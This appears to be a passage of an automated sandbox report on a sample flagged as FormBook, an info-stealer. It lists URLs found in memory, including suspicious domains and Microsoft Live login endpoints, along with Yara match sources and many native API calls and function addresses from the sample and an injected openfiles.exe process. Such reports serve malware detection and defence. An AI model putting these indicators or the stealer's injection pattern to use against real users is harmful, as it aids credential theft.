                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000005C44000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.0000000005344000.00000004.10000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4126711874.0000000007630000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2123173632.0000000027544000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://gamesfunny.top$
                      Source: openfiles.exe, 00000007.00000002.4123887775.0000000002B91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.li
                      Source: openfiles.exe, 00000007.00000002.4123887775.0000000002B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: openfiles.exe, 00000007.00000002.4123887775.0000000002B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: openfiles.exe, 00000007.00000002.4123887775.0000000002B91000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4123887775.0000000002B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: openfiles.exe, 00000007.00000002.4123887775.0000000002B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                      Source: openfiles.exe, 00000007.00000002.4123887775.0000000002B91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: openfiles.exe, 00000007.00000003.2004598316.000000000796C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006D8A000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.000000000648A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://lolipop.jp/
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006D8A000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.000000000648A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006D8A000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.000000000648A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://pepabo.com/
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000005C44000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.0000000005344000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2123173632.0000000027544000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://playchill.top/api/axgames/request?domain=$
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000005C44000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.0000000005344000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2123173632.0000000027544000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006D8A000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.000000000648A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://static.minne.com/files/banner/minne_600x500
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006D8A000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.000000000648A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://support.lolipop.jp/hc/ja/articles/360049132953
                      Source: openfiles.exe, 00000007.00000002.4126876869.0000000007988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: openfiles.exe, 00000007.00000002.4125167672.000000000661C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.strato.de

                      E-Banking Fraud

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 3.2.IETC-24017.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.IETC-24017.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4124676785.0000000004740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4130326224.0000000007C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1822234803.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4124625092.00000000046F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4124804278.0000000004D20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1824149461.0000000003920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0042C973 NtClose,3_2_0042C973
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842B60 NtClose,LdrInitializeThunk,3_2_01842B60
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01842DF0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01842C70
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018435C0 NtCreateMutant,LdrInitializeThunk,3_2_018435C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01844340 NtSetContextThread,3_2_01844340
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01844650 NtSuspendThread,3_2_01844650
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842B80 NtQueryInformationFile,3_2_01842B80
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842BA0 NtEnumerateValueKey,3_2_01842BA0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842BE0 NtQueryValueKey,3_2_01842BE0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842BF0 NtAllocateVirtualMemory,3_2_01842BF0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842AB0 NtWaitForSingleObject,3_2_01842AB0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842AD0 NtReadFile,3_2_01842AD0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842AF0 NtWriteFile,3_2_01842AF0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842DB0 NtEnumerateKey,3_2_01842DB0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842DD0 NtDelayExecution,3_2_01842DD0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842D00 NtSetInformationFile,3_2_01842D00
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842D10 NtMapViewOfSection,3_2_01842D10
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842D30 NtUnmapViewOfSection,3_2_01842D30
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842CA0 NtQueryInformationToken,3_2_01842CA0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842CC0 NtQueryVirtualMemory,3_2_01842CC0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842CF0 NtOpenProcess,3_2_01842CF0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842C00 NtQueryInformationProcess,3_2_01842C00
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842C60 NtCreateKey,3_2_01842C60
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842F90 NtProtectVirtualMemory,3_2_01842F90
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842FA0 NtQuerySection,3_2_01842FA0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842FB0 NtResumeThread,3_2_01842FB0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842FE0 NtCreateFile,3_2_01842FE0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842F30 NtCreateSection,3_2_01842F30
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842F60 NtCreateProcessEx,3_2_01842F60
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842E80 NtReadVirtualMemory,3_2_01842E80
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842EA0 NtAdjustPrivilegesToken,3_2_01842EA0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842EE0 NtQueueApcThread,3_2_01842EE0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01842E30 NtWriteVirtualMemory,3_2_01842E30
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01843090 NtSetValueKey,3_2_01843090
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01843010 NtOpenDirectoryObject,3_2_01843010
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018439B0 NtGetContextThread,3_2_018439B0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01843D10 NtOpenProcessToken,3_2_01843D10
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01843D70 NtOpenThread,3_2_01843D70
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A4650 NtSuspendThread,LdrInitializeThunk,7_2_049A4650
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A4340 NtSetContextThread,LdrInitializeThunk,7_2_049A4340
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_049A2CA0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_049A2C70
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2C60 NtCreateKey,LdrInitializeThunk,7_2_049A2C60
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2DD0 NtDelayExecution,LdrInitializeThunk,7_2_049A2DD0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_049A2DF0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_049A2D10
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_049A2D30
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_049A2E80
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_049A2EE0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2FB0 NtResumeThread,LdrInitializeThunk,7_2_049A2FB0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2FE0 NtCreateFile,LdrInitializeThunk,7_2_049A2FE0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2F30 NtCreateSection,LdrInitializeThunk,7_2_049A2F30
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2AD0 NtReadFile,LdrInitializeThunk,7_2_049A2AD0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2AF0 NtWriteFile,LdrInitializeThunk,7_2_049A2AF0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_049A2BA0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_049A2BF0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2BE0 NtQueryValueKey,LdrInitializeThunk,7_2_049A2BE0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2B60 NtClose,LdrInitializeThunk,7_2_049A2B60
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A35C0 NtCreateMutant,LdrInitializeThunk,7_2_049A35C0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A39B0 NtGetContextThread,LdrInitializeThunk,7_2_049A39B0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2CC0 NtQueryVirtualMemory,7_2_049A2CC0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2CF0 NtOpenProcess,7_2_049A2CF0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2C00 NtQueryInformationProcess,7_2_049A2C00
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2DB0 NtEnumerateKey,7_2_049A2DB0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2D00 NtSetInformationFile,7_2_049A2D00
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2EA0 NtAdjustPrivilegesToken,7_2_049A2EA0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2E30 NtWriteVirtualMemory,7_2_049A2E30
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2F90 NtProtectVirtualMemory,7_2_049A2F90
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2FA0 NtQuerySection,7_2_049A2FA0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2F60 NtCreateProcessEx,7_2_049A2F60
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2AB0 NtWaitForSingleObject,7_2_049A2AB0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A2B80 NtQueryInformationFile,7_2_049A2B80
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A3090 NtSetValueKey,7_2_049A3090
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A3010 NtOpenDirectoryObject,7_2_049A3010
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A3D10 NtOpenProcessToken,7_2_049A3D10
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A3D70 NtOpenThread,7_2_049A3D70
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_007B93A0 NtCreateFile,7_2_007B93A0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_007B9510 NtReadFile,7_2_007B9510
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_007B9610 NtDeleteFile,7_2_007B9610
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_007B96C0 NtClose,7_2_007B96C0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_007B9820 NtAllocateVirtualMemory,7_2_007B9820
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 0_2_025CD3440_2_025CD344
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 0_2_04D172780_2_04D17278
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 0_2_04D100400_2_04D10040
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 0_2_04D100070_2_04D10007
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 0_2_04D172690_2_04D17269
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 0_2_06ECF2800_2_06ECF280
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 0_2_06EC95ED0_2_06EC95ED
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 0_2_06EC95F00_2_06EC95F0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 0_2_06EC05600_2_06EC0560
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 0_2_06EC05590_2_06EC0559
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 0_2_06ECB0F10_2_06ECB0F1
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 0_2_06ECB1000_2_06ECB100
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 0_2_06ECACC80_2_06ECACC8
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 0_2_06EC9A280_2_06EC9A28
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 0_2_06EC9A180_2_06EC9A18
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_004188A33_2_004188A3
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_004028103_2_00402810
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_004030103_2_00403010
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_004100FB3_2_004100FB
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_004101033_2_00410103
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_00416A9E3_2_00416A9E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_00416AA33_2_00416AA3
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_004103233_2_00410323
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0040E3333_2_0040E333
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_00402BCF3_2_00402BCF
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_00402BD03_2_00402BD0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0040E4773_2_0040E477
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0040E4833_2_0040E483
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0040E54A3_2_0040E54A
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0042EF833_2_0042EF83
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018D01AA3_2_018D01AA
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C41A23_2_018C41A2
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C81CC3_2_018C81CC
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018001003_2_01800100
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AA1183_2_018AA118
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018981583_2_01898158
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A20003_2_018A2000
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018D03E63_2_018D03E6
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181E3F03_2_0181E3F0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CA3523_2_018CA352
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018902C03_2_018902C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B02743_2_018B0274
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018D05913_2_018D0591
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018105353_2_01810535
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018BE4F63_2_018BE4F6
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B44203_2_018B4420
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C24463_2_018C2446
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180C7C03_2_0180C7C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018347503_2_01834750
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018107703_2_01810770
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182C6E03_2_0182C6E0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018129A03_2_018129A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018DA9A63_2_018DA9A6
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018269623_2_01826962
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183E8F03_2_0183E8F0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181A8403_2_0181A840
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018128403_2_01812840
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017F68B83_2_017F68B8
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C6BD73_2_018C6BD7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CAB403_2_018CAB40
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180EA803_2_0180EA80
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01828DBF3_2_01828DBF
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180ADE03_2_0180ADE0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181AD003_2_0181AD00
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018ACD1F3_2_018ACD1F
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0CB53_2_018B0CB5
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01800CF23_2_01800CF2
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810C003_2_01810C00
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188EFA03_2_0188EFA0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01802FC83_2_01802FC8
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01852F283_2_01852F28
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01830F303_2_01830F30
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B2F303_2_018B2F30
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01884F403_2_01884F40
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01822E903_2_01822E90
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CCE933_2_018CCE93
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CEEDB3_2_018CEEDB
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CEE263_2_018CEE26
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810E593_2_01810E59
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FF1723_2_017FF172
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181B1B03_2_0181B1B0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018DB16B3_2_018DB16B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0184516C3_2_0184516C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018170C03_2_018170C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018BF0CC3_2_018BF0CC
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C70E93_2_018C70E9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CF0E03_2_018CF0E0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0185739A3_2_0185739A
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FD34C3_2_017FD34C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C132D3_2_018C132D
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018152A03_2_018152A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182B2C03_2_0182B2C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B12ED3_2_018B12ED
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182D2F03_2_0182D2F0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AD5B03_2_018AD5B0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C75713_2_018C7571
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CF43F3_2_018CF43F
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018014603_2_01801460
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CF7B03_2_018CF7B0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C16CC3_2_018C16CC
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A59103_2_018A5910
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018199503_2_01819950
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182B9503_2_0182B950
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018138E03_2_018138E0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187D8003_2_0187D800
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182FB803_2_0182FB80
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01885BF03_2_01885BF0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0184DBF93_2_0184DBF9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CFB763_2_018CFB76
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01855AA03_2_01855AA0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018ADAAC3_2_018ADAAC
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B1AA33_2_018B1AA3
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018BDAC63_2_018BDAC6
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CFA493_2_018CFA49
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C7A463_2_018C7A46
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01883A6C3_2_01883A6C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182FDC03_2_0182FDC0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01813D403_2_01813D40
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C1D5A3_2_018C1D5A
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C7D733_2_018C7D73
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CFCF23_2_018CFCF2
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01889C323_2_01889C32
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01811F923_2_01811F92
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CFFB13_2_018CFFB1
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CFF093_2_018CFF09
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01819EB03_2_01819EB0
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CC0FFD6_2_07CC0FFD
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CC0FF16_2_07CC0FF1
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CC2E9D6_2_07CC2E9D
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CC0EAD6_2_07CC0EAD
